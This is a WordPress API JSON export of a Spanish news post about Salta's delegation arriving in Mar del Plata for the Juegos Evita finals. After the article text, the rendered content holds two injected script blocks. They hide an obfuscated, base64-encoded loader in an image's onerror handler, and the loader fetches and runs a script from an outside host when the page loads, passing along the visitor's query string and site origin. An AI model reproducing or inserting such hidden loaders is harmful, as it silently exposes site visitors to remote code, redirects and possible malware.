{"id":3127,"date":"2023-09-24T23:18:30","date_gmt":"2023-09-25T02:18:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3127"},"modified":"2025-08-14T00:08:07","modified_gmt":"2025-08-14T03:08:07","slug":"la-delegacion-de-salta-para-los-juegos-evita-ya-esta-en-mar-del-plata","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3127","title":{"rendered":"La delegaci\u00f3n de Salta para los Juegos Evita ya est\u00e1 en Mar del Plata"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>El equipo Salta integrado por 900 personas, iniciar\u00e1 este lunes los d\u00edas de competencia, hasta el 30 de septiembre.<\/em><\/h4>\n\n\n\n<p>La delegaci\u00f3n de Salta para las finales nacionales de Los Juegos Evita, la integran 900 personas, de las cuales 660 son deportistas que competir\u00e1n en 60 disciplinas . La caravana fue despedida ayer por el gobernador<strong>&nbsp;Gustavo S\u00e1enz<\/strong>&nbsp;quien destac\u00f3 esta oportunidad de demostrar su pasi\u00f3n, potenciar trabajo en equipo e integraci\u00f3n.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9041-la-delegacion-de-salta-para-los-juegos-evita-ya-esta-en-mar-del-plata.jpg\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9041-la-delegacion-de-salta-para-los-juegos-evita-ya-esta-en-mar-del-plata.jpg\" alt=\"La delegaci\u00f3n de Salta para los Juegos Evita ya est\u00e1 en Mar del Plata\" width=\"292\" height=\"194\"\/><\/a><\/figure><\/div>\n\n\n<p>El secretario de Deportes&nbsp;<strong>Sergio Chib\u00e1n<\/strong>&nbsp;recibi\u00f3 a la delegaci\u00f3n salte\u00f1a que lleg\u00f3 al mediod\u00eda a la ciudad de Mar del Plata. \u00abEstos Juegos, nos permiten la integraci\u00f3n, la amistad y la competitividad amateur, son muy importantes para nuestros ni\u00f1os y j\u00f3venes\u00bb, indic\u00f3 el funcionario al destacar que la delegaci\u00f3n lleg\u00f3 con anticipaci\u00f3n a la ciudad de Mar del Plata para iniciar una semana de competencia estando descansados.<\/p>\n\n\n\n<p>Agreg\u00f3 que \u00abestamos acompa\u00f1ando a los deportistas dese\u00e1ndoles el mayor de los \u00e9xitos y como dijo nuestro Gobernador Gustavo S\u00e1enz, que disfruten al m\u00e1ximo de esta competencia. Para muchos chicos, fue su primera vez frente al mar, se\u00f1al\u00f3.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9042-la-delegacion-de-salta-para-los-juegos-evita-ya-esta-en-mar-del-plata.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/9042-la-delegacion-de-salta-para-los-juegos-evita-ya-esta-en-mar-del-plata.jpg\" alt=\"La delegaci\u00f3n de Salta para los Juegos Evita ya est\u00e1 en Mar del Plata\" width=\"273\" height=\"182\"\/><\/a><\/figure><\/div>\n\n\n<p>Acompa\u00f1aron a Sergio Chiban, la subsecretaria de Deportes Social&nbsp;<strong>Claudia V\u00e1sque<\/strong>z, el coordinador general<strong>&nbsp;Claudio Acu\u00f1a<\/strong>, los coordinadores de cada disciplina y encargados de deportes\u00bb.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/la-delegacion-de-salta-para-los-juegos-evita-ya-esta-en-mar-del-plata-91990\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El equipo Salta integrado por 900 personas, iniciar\u00e1 este lunes los d\u00edas de competencia, hasta el 30 de septiembre. La delegaci\u00f3n de Salta para las finales nacionales de Los Juegos Evita, la integran 900 personas, de las cuales 660 son deportistas que competir\u00e1n en 60 disciplinas . La caravana fue despedida ayer por el gobernador&nbsp;Gustavo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3128,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-3127","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3127"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3127"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3127\/revisions"}],"predecessor-version":[{"id":6959,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3127\/revisions\/6959"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3128"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}